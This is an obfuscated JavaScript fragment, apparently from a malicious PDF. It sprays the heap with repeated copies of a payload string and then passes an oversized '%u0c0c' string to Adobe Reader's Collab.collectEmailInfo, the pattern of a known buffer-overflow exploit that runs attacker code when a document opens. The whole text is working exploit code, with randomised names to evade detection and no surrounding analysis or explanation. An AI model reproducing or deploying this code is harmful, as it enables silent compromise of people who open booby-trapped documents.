while (fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU;
sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl;
var dakslfjaljfklasfjasdlk = Array;
afsdfasfcxzfcsdagfdgfgfasdfafacadf = new dakslfjaljfklasfjasdlk();
for(afdadfcznzmzhczjncafahfjkasdhfjkdfh=0;afdadfcznzmzhczjncafahfjkasdhfjkdfh<300;afdadfcznzmzhczjncafahfjkasdhfjkdfh++) afsdfasfcxzfcsdagfdgfgfasdfafacadf[afdadfcznzmzhczjncafahfjkasdhfjkdfh] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY;
var iJCYnMqYfdUqJybccHmtjpgocdxIgC = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x75\x30c\x30c\x25\x750c0c");
while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x1200) iJCYnMqYfdUqJybccHmtjpgocdxIgC =iJCYnMqYfdUqJybccHmtjpgocdxIgC+iJCYnMqYfdUqJybccHmtjpgocdxIgC;
var adfafasdffsfsdfdfvcvv = Collab;
var dfzfddfgfgasfasddcacs = this;
dfzfddfgfgasfasddcacs.collabStore = adfafasdffsfsdfdfvcvv["collectEmailInfo"]({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});